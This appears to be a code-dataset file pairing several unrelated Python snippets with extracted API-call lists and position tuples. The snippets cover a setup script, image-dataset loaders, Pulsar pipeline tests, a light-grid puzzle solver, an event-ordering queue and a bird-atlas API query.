if buildtools:
cmdclass = {
'bdist_zipapp': buildtools.make_bdist_zipapp(main_optional=True),
}
else:
cmdclass = {}
setup(
name = 'startup',
version = startup.__version__,
description = 'A dependency graph resolver for program startup',
long_description = startup.__doc__,
author = startup.__author__,
author_email = startup.__author_email__,
license = startup.__license__,
url = 'https://github.com/clchiou/startup',
cmdclass = cmdclass,
py_modules = ['startup'],
test_suite = 'tests',
platforms = '*',
classifiers = [
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
|
[
"g1.devtools.buildtools.make_bdist_zipapp",
"setuptools.setup"
] |
[((272, 958), 'setuptools.setup', 'setup', ([], {'name': '"""startup"""', 'version': 'startup.__version__', 'description': '"""A dependency graph resolver for program startup"""', 'long_description': 'startup.__doc__', 'author': 'startup.__author__', 'author_email': 'startup.__author_email__', 'license': 'startup.__license__', 'url': '"""https://github.com/clchiou/startup"""', 'cmdclass': 'cmdclass', 'py_modules': "['startup']", 'test_suite': '"""tests"""', 'platforms': '"""*"""', 'classifiers': "['Development Status :: 1 - Planning', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Software Development :: Libraries :: Python Modules']"}), "(name='startup', version=startup.__version__, description=\n 'A dependency graph resolver for program startup', long_description=\n startup.__doc__, author=startup.__author__, author_email=startup.\n __author_email__, license=startup.__license__, url=\n 'https://github.com/clchiou/startup', cmdclass=cmdclass, py_modules=[\n 'startup'], test_suite='tests', platforms='*', classifiers=[\n 'Development Status :: 1 - Planning', 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3 :: Only',\n 'Topic :: Software Development :: Libraries :: Python Modules'])\n", (277, 958), False, 'from setuptools import setup\n'), ((190, 238), 'g1.devtools.buildtools.make_bdist_zipapp', 'buildtools.make_bdist_zipapp', ([], {'main_optional': '(True)'}), '(main_optional=True)\n', (218, 238), False, 'from g1.devtools import buildtools\n')]
|
import os
from datas.benchmark import Benchmark
from datas.div2k import DIV2K
from torch.utils.data import DataLoader
def create_datasets(args):
div2k = DIV2K(
os.path.join(args.data_path, 'DIV2K/DIV2K_train_HR'),
os.path.join(args.data_path, 'DIV2K/DIV2K_train_LR_bicubic'),
os.path.join(args.data_path, 'div2k_cache'),
train=True,
augment=args.data_augment,
scale=args.scale,
colors=args.colors,
patch_size=args.patch_size,
repeat=args.data_repeat,
)
train_dataloader = DataLoader(dataset=div2k, num_workers=args.threads, batch_size=args.batch_size, shuffle=True, pin_memory=True, drop_last=True)
valid_dataloaders = []
if 'Set5' in args.eval_sets:
set5_hr_path = os.path.join(args.data_path, 'benchmark/Set5/HR')
set5_lr_path = os.path.join(args.data_path, 'benchmark/Set5/LR_bicubic')
set5 = Benchmark(set5_hr_path, set5_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'set5', 'dataloader': DataLoader(dataset=set5, batch_size=1, shuffle=False)}]
if 'Set14' in args.eval_sets:
set14_hr_path = os.path.join(args.data_path, 'benchmark/Set14/HR')
set14_lr_path = os.path.join(args.data_path, 'benchmark/Set14/LR_bicubic')
set14 = Benchmark(set14_hr_path, set14_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'set14', 'dataloader': DataLoader(dataset=set14, batch_size=1, shuffle=False)}]
if 'B100' in args.eval_sets:
b100_hr_path = os.path.join(args.data_path, 'benchmark/B100/HR')
b100_lr_path = os.path.join(args.data_path, 'benchmark/B100/LR_bicubic')
b100 = Benchmark(b100_hr_path, b100_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'b100', 'dataloader': DataLoader(dataset=b100, batch_size=1, shuffle=False)}]
if 'Urban100' in args.eval_sets:
u100_hr_path = os.path.join(args.data_path, 'benchmark/Urban100/HR')
u100_lr_path = os.path.join(args.data_path, 'benchmark/Urban100/LR_bicubic')
u100 = Benchmark(u100_hr_path, u100_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'u100', 'dataloader': DataLoader(dataset=u100, batch_size=1, shuffle=False)}]
if 'Manga109' in args.eval_sets:
manga_hr_path = os.path.join(args.data_path, 'benchmark/Manga109/HR')
manga_lr_path = os.path.join(args.data_path, 'benchmark/Manga109/LR_bicubic')
manga = Benchmark(manga_hr_path, manga_lr_path, scale=args.scale, colors=args.colors)
valid_dataloaders += [{'name': 'manga109', 'dataloader': DataLoader(dataset=manga, batch_size=1, shuffle=False)}]
if len(valid_dataloaders) == 0:
print('select no dataset for evaluation!')
else:
        selected = ', '.join(d['name'] for d in valid_dataloaders)
        print('select {} for evaluation!'.format(selected))
return train_dataloader, valid_dataloaders
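# A minimal usage sketch, assuming an argparse-style namespace; the field
# names below are exactly the ones create_datasets() reads, the values are
# illustrative only:
#
#     from argparse import Namespace
#     args = Namespace(data_path='./datasets', data_augment=True, scale=2,
#                      colors=3, patch_size=96, data_repeat=1, threads=4,
#                      batch_size=16, eval_sets=['Set5', 'B100'])
#     train_dataloader, valid_dataloaders = create_datasets(args)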
|
[
"datas.benchmark.Benchmark",
"os.path.join",
"torch.utils.data.DataLoader"
] |
[((566, 697), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'div2k', 'num_workers': 'args.threads', 'batch_size': 'args.batch_size', 'shuffle': '(True)', 'pin_memory': '(True)', 'drop_last': '(True)'}), '(dataset=div2k, num_workers=args.threads, batch_size=args.\n batch_size, shuffle=True, pin_memory=True, drop_last=True)\n', (576, 697), False, 'from torch.utils.data import DataLoader\n'), ((174, 226), 'os.path.join', 'os.path.join', (['args.data_path', '"""DIV2K/DIV2K_train_HR"""'], {}), "(args.data_path, 'DIV2K/DIV2K_train_HR')\n", (186, 226), False, 'import os\n'), ((237, 297), 'os.path.join', 'os.path.join', (['args.data_path', '"""DIV2K/DIV2K_train_LR_bicubic"""'], {}), "(args.data_path, 'DIV2K/DIV2K_train_LR_bicubic')\n", (249, 297), False, 'import os\n'), ((308, 351), 'os.path.join', 'os.path.join', (['args.data_path', '"""div2k_cache"""'], {}), "(args.data_path, 'div2k_cache')\n", (320, 351), False, 'import os\n'), ((781, 830), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set5/HR"""'], {}), "(args.data_path, 'benchmark/Set5/HR')\n", (793, 830), False, 'import os\n'), ((854, 911), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set5/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Set5/LR_bicubic')\n", (866, 911), False, 'import os\n'), ((928, 1003), 'datas.benchmark.Benchmark', 'Benchmark', (['set5_hr_path', 'set5_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(set5_hr_path, set5_lr_path, scale=args.scale, colors=args.colors)\n', (937, 1003), False, 'from datas.benchmark import Benchmark\n'), ((1179, 1229), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set14/HR"""'], {}), "(args.data_path, 'benchmark/Set14/HR')\n", (1191, 1229), False, 'import os\n'), ((1254, 1312), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Set14/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Set14/LR_bicubic')\n", (1266, 1312), False, 'import os\n'), ((1329, 1406), 'datas.benchmark.Benchmark', 'Benchmark', (['set14_hr_path', 'set14_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(set14_hr_path, set14_lr_path, scale=args.scale, colors=args.colors)\n', (1338, 1406), False, 'from datas.benchmark import Benchmark\n'), ((1582, 1631), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/B100/HR"""'], {}), "(args.data_path, 'benchmark/B100/HR')\n", (1594, 1631), False, 'import os\n'), ((1655, 1712), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/B100/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/B100/LR_bicubic')\n", (1667, 1712), False, 'import os\n'), ((1729, 1804), 'datas.benchmark.Benchmark', 'Benchmark', (['b100_hr_path', 'b100_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(b100_hr_path, b100_lr_path, scale=args.scale, colors=args.colors)\n', (1738, 1804), False, 'from datas.benchmark import Benchmark\n'), ((1982, 2035), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Urban100/HR"""'], {}), "(args.data_path, 'benchmark/Urban100/HR')\n", (1994, 2035), False, 'import os\n'), ((2059, 2120), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Urban100/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Urban100/LR_bicubic')\n", (2071, 2120), False, 'import os\n'), ((2137, 2212), 'datas.benchmark.Benchmark', 'Benchmark', (['u100_hr_path', 'u100_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(u100_hr_path, u100_lr_path, scale=args.scale, colors=args.colors)\n', (2146, 2212), False, 'from 
datas.benchmark import Benchmark\n'), ((2391, 2444), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Manga109/HR"""'], {}), "(args.data_path, 'benchmark/Manga109/HR')\n", (2403, 2444), False, 'import os\n'), ((2469, 2530), 'os.path.join', 'os.path.join', (['args.data_path', '"""benchmark/Manga109/LR_bicubic"""'], {}), "(args.data_path, 'benchmark/Manga109/LR_bicubic')\n", (2481, 2530), False, 'import os\n'), ((2547, 2624), 'datas.benchmark.Benchmark', 'Benchmark', (['manga_hr_path', 'manga_lr_path'], {'scale': 'args.scale', 'colors': 'args.colors'}), '(manga_hr_path, manga_lr_path, scale=args.scale, colors=args.colors)\n', (2556, 2624), False, 'from datas.benchmark import Benchmark\n'), ((1065, 1118), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'set5', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=set5, batch_size=1, shuffle=False)\n', (1075, 1118), False, 'from torch.utils.data import DataLoader\n'), ((1469, 1523), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'set14', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=set14, batch_size=1, shuffle=False)\n', (1479, 1523), False, 'from torch.utils.data import DataLoader\n'), ((1866, 1919), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'b100', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=b100, batch_size=1, shuffle=False)\n', (1876, 1919), False, 'from torch.utils.data import DataLoader\n'), ((2274, 2327), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'u100', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=u100, batch_size=1, shuffle=False)\n', (2284, 2327), False, 'from torch.utils.data import DataLoader\n'), ((2690, 2744), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'manga', 'batch_size': '(1)', 'shuffle': '(False)'}), '(dataset=manga, batch_size=1, shuffle=False)\n', (2700, 2744), False, 'from torch.utils.data import DataLoader\n')]
|
# Copyright 2020 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import string
import pytest
from pulsar import MessageId
from streamsets.testframework.decorators import stub
from streamsets.testframework.markers import pulsar, sdc_min_version
from streamsets.testframework.utils import get_random_string
import json
logger = logging.getLogger(__name__)
# Topics are URLs so we have to respect URL specs
TOPIC_NAMES = [
('lowercase', get_random_string(string.ascii_lowercase)),
('uppercase', get_random_string(string.ascii_uppercase)),
('letters', get_random_string(string.ascii_letters)),
('digits', get_random_string(string.digits)),
('hexadecimal', get_random_string(string.hexdigits).lower()),
    ('hyphen', get_random_string() + '-' + get_random_string()),
    ('start_hyphen', '-' + get_random_string()),
    ('end_hyphen', get_random_string() + '-'),
('underscore', get_random_string() + '_' + get_random_string()),
('start_underscore', get_random_string() + '_'),
('end_underscore', '_' + get_random_string()),
('dot', get_random_string() + '.' + get_random_string()),
('start_dot', '.' + get_random_string()),
('end_dot', get_random_string() + '.')
]
@pulsar
def test_data_types(sdc_builder, sdc_executor, pulsar):
pytest.skip("Pulsar isn't a typed data store")
@pulsar
@pytest.mark.parametrize('test_name, topic_name', TOPIC_NAMES, ids=[t[0] for t in TOPIC_NAMES])
def test_object_names_topic(sdc_builder, sdc_executor, pulsar, test_name, topic_name, keep_data):
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.data_format = 'TEXT'
source.raw_data = 'Hi!'
source.stop_after_first_batch = True
producer = builder.add_stage('Pulsar Producer')
producer.topic = topic_name
producer.data_format = 'TEXT'
source >> producer
pipeline = builder.build().configure_for_environment(pulsar)
pipeline.configuration['rateLimit'] = 1
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
messages = _dump_messages_and_clean_up(topic_name, pulsar, keep_data)
assert messages == ["Hi!"]
@pulsar
def test_dataflow_events(sdc_builder, sdc_executor, pulsar):
pytest.skip('Pulsar Origin does not produce events')
@pulsar
def test_multiple_batch(sdc_builder, sdc_executor, pulsar, keep_data):
batch_size = 100
batches = 10
topic = get_random_string()
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('Dev Data Generator')
origin.batch_size = batch_size
origin.delay_between_batches = 0
origin.fields_to_generate = [{
"type": "LONG_SEQUENCE",
"field": "seq"
}]
producer = builder.add_stage('Pulsar Producer')
producer.topic = topic
producer.data_format = 'JSON'
producer.async_send = False
origin >> producer
pipeline = builder.build().configure_for_environment(pulsar)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline)
sdc_executor.wait_for_pipeline_metric(pipeline, 'input_record_count', batch_size * batches)
sdc_executor.stop_pipeline(pipeline)
history = sdc_executor.get_pipeline_history(pipeline)
recordsCount = history.latest.metrics.counter('pipeline.batchInputRecords.counter').count
logger.info(f"Wrote {recordsCount} records")
messages = _dump_messages_and_clean_up(topic, pulsar, keep_data)
sequence = [int(json.loads(m)['seq']) for m in messages]
assert sorted(sequence) == [*range(0, recordsCount)]
@pulsar
def test_push_pull(sdc_builder, sdc_executor, cluster):
pytest.skip("We haven't re-implemented this test since Dev Data Generator (push) is art of test_multiple_batches and Dev Raw Data Source (pull) is part of test_data_types.")
@stub
def test_data_format_binary(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_delimited(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_json(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_protobuf(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_text(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_sdc_record(sdc_builder, sdc_executor):
pass
@stub
def test_data_format_xml(sdc_builder, sdc_executor):
pass
def _dump_messages_and_clean_up(topic_name, pulsar, keep_data):
msgs_received = []
client = pulsar.client
admin = pulsar.admin
    reader = None
    try:
        reader = client.create_reader(topic_name, MessageId.earliest)
        while reader.has_message_available():
            msgs_received.append(reader.read_next().data().decode().strip())  # strip to remove newlines
    finally:
        if reader is not None:
            reader.close()  # reader needs to be closed before topic can be deleted without force
        client.close()
if not keep_data:
admin.delete_topic(reader.topic())
logger.debug('Number of messages received from Pulsar = %d', len(msgs_received))
return msgs_received
|
[
"json.loads",
"pytest.skip",
"streamsets.testframework.utils.get_random_string",
"pytest.mark.parametrize",
"logging.getLogger"
] |
[((858, 885), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (875, 885), False, 'import logging\n'), ((1863, 1961), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""test_name, topic_name"""', 'TOPIC_NAMES'], {'ids': '[t[0] for t in TOPIC_NAMES]'}), "('test_name, topic_name', TOPIC_NAMES, ids=[t[0] for\n t in TOPIC_NAMES])\n", (1886, 1961), False, 'import pytest\n'), ((1805, 1851), 'pytest.skip', 'pytest.skip', (['"""Pulsar isn\'t a typed data store"""'], {}), '("Pulsar isn\'t a typed data store")\n', (1816, 1851), False, 'import pytest\n'), ((2798, 2850), 'pytest.skip', 'pytest.skip', (['"""Pulsar Origin does not produce events"""'], {}), "('Pulsar Origin does not produce events')\n", (2809, 2850), False, 'import pytest\n'), ((2982, 3001), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (2999, 3001), False, 'from streamsets.testframework.utils import get_random_string\n'), ((4192, 4375), 'pytest.skip', 'pytest.skip', (['"""We haven\'t re-implemented this test since Dev Data Generator (push) is art of test_multiple_batches and Dev Raw Data Source (pull) is part of test_data_types."""'], {}), '(\n "We haven\'t re-implemented this test since Dev Data Generator (push) is art of test_multiple_batches and Dev Raw Data Source (pull) is part of test_data_types."\n )\n', (4203, 4375), False, 'import pytest\n'), ((971, 1012), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.ascii_lowercase'], {}), '(string.ascii_lowercase)\n', (988, 1012), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1033, 1074), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.ascii_uppercase'], {}), '(string.ascii_uppercase)\n', (1050, 1074), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1093, 1132), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.ascii_letters'], {}), '(string.ascii_letters)\n', (1110, 1132), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1150, 1182), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.digits'], {}), '(string.digits)\n', (1167, 1182), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1293, 1312), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1310, 1312), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1341, 1360), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1358, 1360), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1381, 1400), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1398, 1400), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1456, 1475), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1473, 1475), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1503, 1522), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1520, 1522), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1560, 1579), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1577, 1579), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1622, 1641), 
'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1639, 1641), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1668, 1687), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1685, 1687), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1706, 1725), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1723, 1725), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1205, 1240), 'streamsets.testframework.utils.get_random_string', 'get_random_string', (['string.hexdigits'], {}), '(string.hexdigits)\n', (1222, 1240), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1265, 1284), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1282, 1284), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1428, 1447), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1445, 1447), False, 'from streamsets.testframework.utils import get_random_string\n'), ((1594, 1613), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {}), '()\n', (1611, 1613), False, 'from streamsets.testframework.utils import get_random_string\n'), ((4024, 4037), 'json.loads', 'json.loads', (['m'], {}), '(m)\n', (4034, 4037), False, 'import json\n')]
|
# import pyautogui
#
# pyautogui.typewrite('akasjhaks')
from pathlib import Path
unique = []
with open(Path("C:/Users/christiano/Downloads/Untitled-AB.txt"), 'r') as f:
for line in f:
line = line.strip()
if line not in unique:
unique.append(line)
print(line)
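# An equivalent sketch that avoids the O(n) list scan per line:
# dict.fromkeys() removes duplicates while preserving first-seen order.
#
#     with open(Path("C:/Users/christiano/Downloads/Untitled-AB.txt"), 'r') as f:
#         for line in dict.fromkeys(l.strip() for l in f):
#             print(line)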
|
[
"pathlib.Path"
] |
[((105, 158), 'pathlib.Path', 'Path', (['"""C:/Users/christiano/Downloads/Untitled-AB.txt"""'], {}), "('C:/Users/christiano/Downloads/Untitled-AB.txt')\n", (109, 158), False, 'from pathlib import Path\n')]
|
import re
grid = []
size = 1000
class Grid:
def __init__(self, size):
self.size = size
self.grid = [ [0]*size for e in range(size) ]
print(f'Initiated a {size}*{size} grid.')
def turnOn(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 1
def turnOff(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 0
def toggle(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 1 - self.grid[x][y]
def processInstruction(self, instruction):
print(f'process instruction "{instruction}"')
coordinates = re.findall(r'(\d+),(\d+) through (\d+),(\d+)', instruction)[0]
xstart, ystart, xend, yend = map(int, coordinates)
if (instruction[1] == 'o'): #t*o*ggle
return self.toggle(xstart, ystart, xend, yend)
if (instruction[6] == 'f'): #turn o*f*f
return self.turnOff(xstart, ystart, xend, yend)
if (instruction[6] == 'n'): #turn o*n*
return self.turnOn(xstart, ystart, xend, yend)
def countLights(self):
return sum(map(sum, self.grid))
def debug(self):
for x in range(size):
print(self.grid[x])
print('-'*2*size)
class GridTwo(Grid):
def turnOn(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] += 1
def turnOff(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = max(self.grid[x][y] - 1, 0)
def toggle(self, xstart, ystart, xend, yend):
for x in range(xstart, xend+1):
for y in range(ystart, yend+1):
self.grid[x][y] = 2 + self.grid[x][y]
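# GridTwo reinterprets the instructions as brightness levels: "turn on" adds 1,
# "turn off" subtracts 1 (clamped at 0), and "toggle" adds 2, so the inherited
# countLights() then sums total brightness instead of counting lit cells.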
grid = Grid(size)
grid2 = GridTwo(size)
with open(__file__+'.input', "r+") as file:
inputStr = file.read()
for instruction in filter(None, inputStr.split('\n')):
grid.processInstruction(instruction)
grid2.processInstruction(instruction)
print(f'PART1 : {grid.countLights()}')
print(f'PART2 : {grid2.countLights()}')
|
[
"re.findall"
] |
[((877, 939), 're.findall', 're.findall', (['"""(\\\\d+),(\\\\d+) through (\\\\d+),(\\\\d+)"""', 'instruction'], {}), "('(\\\\d+),(\\\\d+) through (\\\\d+),(\\\\d+)', instruction)\n", (887, 939), False, 'import re\n')]
|
# -*- coding: utf-8 -*-
'''
Module containing classes related to enforcing orderings upon messages.
'''
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import Queue
import threading
import time
from .exception import QueueClearingException
def _cur_time():
    '''Returns the current monotonic time in microseconds.'''
return time.clock_gettime(time.CLOCK_MONOTONIC_RAW) * 1000000
class EventOrderer(object):
'''In memory priority queue to order messages'''
_EMWA_CONSTANT = 0.9
def __init__(self, max_wind):
super(EventOrderer, self).__init__()
self.priority_queue = Queue.PriorityQueue()
self.q_over_min = threading.Condition()
self.max_wind = max_wind
self.last_time = _cur_time()
self.inter = 1
self.min_inter = 100000
self.clearing = False
def _update_inter(self):
'''Update the queues interval count.'''
t_now = _cur_time()
t_diff = (t_now - self.last_time)
self.last_time = t_now
self.inter = (self.inter * self._EMWA_CONSTANT +
t_diff * (1 - self._EMWA_CONSTANT))
if self.inter < self.min_inter:
self.min_inter = self.inter
def _window_size(self):
'''Return the current minimum window size.'''
return max(self.max_wind * (self.min_inter / self.inter),
self.max_wind)
def _extract_cond(self):
'''Evaluate the extraction condition, queue_size > min_window'''
return (self.clearing or
self.priority_queue.qsize() > self._window_size())
def push(self, msgs):
'''Push a list of messages msgs onto the queue.'''
with self.q_over_min:
if self.clearing:
raise QueueClearingException()
for (pri, val) in msgs:
self.priority_queue.put((pri, val), False)
self._update_inter()
if self._extract_cond():
self.q_over_min.notify()
def pop(self):
'''Pop the message from the queue with the lowest priority.'''
with self.q_over_min:
while not self._extract_cond():
self.q_over_min.wait()
item = self.priority_queue.get(False)
return item
def start_clear(self):
'''Clear the queue of message returning all remaining messages as a
list.'''
with self.q_over_min:
self.clearing = True
self.q_over_min.notify()
def stop_clear(self):
'''Stop a queue clear and resume normal activities.'''
with self.q_over_min:
self.clearing = False
def get_queue_size(self):
'''Returns queue size'''
return self.priority_queue.qsize()
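# A minimal usage sketch: producers push (priority, value) pairs, and pop()
# blocks until the queue has grown past the adaptive minimum window (or a
# clear has been started), then yields items in priority order.
#
#     orderer = EventOrderer(max_wind=8)
#     orderer.push([(2, 'second'), (1, 'first')])
#     orderer.start_clear()          # allow draining below the window size
#     pri, val = orderer.pop()      # -> (1, 'first')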
|
[
"threading.Condition",
"time.clock_gettime",
"Queue.PriorityQueue"
] |
[((395, 439), 'time.clock_gettime', 'time.clock_gettime', (['time.CLOCK_MONOTONIC_RAW'], {}), '(time.CLOCK_MONOTONIC_RAW)\n', (413, 439), False, 'import time\n'), ((668, 689), 'Queue.PriorityQueue', 'Queue.PriorityQueue', ([], {}), '()\n', (687, 689), False, 'import Queue\n'), ((716, 737), 'threading.Condition', 'threading.Condition', ([], {}), '()\n', (735, 737), False, 'import threading\n')]
|
import atlas.common as common
def observation_coordinates(square_id):
url = f"https://api.laji.fi/v0/warehouse/query/unit/list?selected=gathering.conversions.wgs84CenterPoint.lat%2Cgathering.conversions.wgs84CenterPoint.lon%2Cgathering.coordinatesVerbatim&pageSize=1000&page=1&cache=true&taxonId=MX.37580&useIdentificationAnnotations=true&includeSubTaxa=true&includeNonValidTaxa=true&time=2022%2F2025&individualCountMin=1&coordinates={square_id}%3AYKJ&qualityIssues=NO_ISSUES&atlasClass=MY.atlasClassEnumB%2CMY.atlasClassEnumC%2CMY.atlasClassEnumD&coordinateAccuracyMax=5000&access_token=";
data_dict = common.fetch_finbif_api(url)
obs_count = data_dict["total"]
coord_string = ""
for obs in data_dict["results"]:
        # TODO: skip observations that only have the square's center point,
        # i.e. where obs['gathering'] has no 'coordinatesVerbatim' value
lat = obs['gathering']['conversions']['wgs84CenterPoint']['lat']
lon = obs['gathering']['conversions']['wgs84CenterPoint']['lon']
coord_string = coord_string + f"[{lat},{lon}],\n"
return coord_string, obs_count
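# Note: the user-facing strings built below are Finnish. Roughly: "havaintoa" =
# "observations", "Ruutulta ei ole vielä havaintoja" = "The square has no
# observations yet", and the longer sentence reports what share of the square's
# observations can be shown on the map, per coordinate-accuracy class.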
def coordinate_accuracy_html_loop(data):
html = ""
for accuracy, count in data.items():
html = html + accuracy + " m: " + str(count) + " havaintoa, "
return html[0:-2]
def coordinate_accuracy_html(data):
over10000 = data.get("over", 0) + data.get("25000", 0) + data.get("10000", 0)
    under10000 = data.get("5000", 0)
    under1000 = data.get("1000", 0)
under100 = data.get("100", 0)
under10 = data.get("10", 0) + data.get("1", 0)
mappable = under10000 + under1000 + under100 + under10
total = over10000 + mappable
if 0 == total:
return "Ruutulta ei ole vielรค havaintoja"
mappable_percentage = round(mappable / total * 100, 1)
html = f"Kartalla nรคytetรครคn <strong>{mappable_percentage} %</strong> ruudun <strong>{total} havainnosta</strong>. Havaintojen mรครคrรค eri tarkkuusluokissa: "
html = html + "yli 10000 m: <strong>" + str(over10000) + "</strong>, "
html = html + "5000 m: <strong>" + str(under10000) + "</strong>, "
html = html + "1000 m: <strong>" + str(under1000) + "</strong>, "
html = html + "100 m: <strong>" + str(under100) + "</strong>, "
html = html + "alle 10 m: <strong>" + str(under10) + "</strong>, "
return html[0:-2]
def main(square_id_untrusted):
html = dict()
square_id = common.valid_square_id(square_id_untrusted)
html["square_id"] = square_id
neighbour_ids = common.neighbour_ids(square_id)
html["neighbour_ids"] = neighbour_ids
coordinates, mappable_obs_count = observation_coordinates(square_id)
html["coordinates"] = coordinates
html["mappable_obs_count"] = mappable_obs_count
coordinate_accuracy_data, total_obs_count = common.coordinate_accuracy_data(square_id)
html["accuracies"] = coordinate_accuracy_html(coordinate_accuracy_data)
# html["total_obs_count"] = collection_counts(square_id)
square_name, society, centerpoint, cornerpoints = common.square_info(square_id)
# Todo: Make heading the same way as on squareform
html["heading"] = f"{square_id} {square_name}"
html["centerpoint"] = centerpoint
html["cornerpoints"] = cornerpoints
return html
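
# Hedged usage sketch (not part of the original module): coordinate_accuracy_html
# buckets observation counts by accuracy class; the keys below mirror the
# .get() calls above and the counts are invented for illustration.
if __name__ == "__main__":
    sample = {"over": 2, "25000": 1, "10000": 3, "5000": 10, "1000": 50, "100": 200, "10": 30, "1": 4}
    print(coordinate_accuracy_html(sample))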
|
[
"atlas.common.coordinate_accuracy_data",
"atlas.common.square_info",
"atlas.common.neighbour_ids",
"atlas.common.fetch_finbif_api",
"atlas.common.valid_square_id"
] |
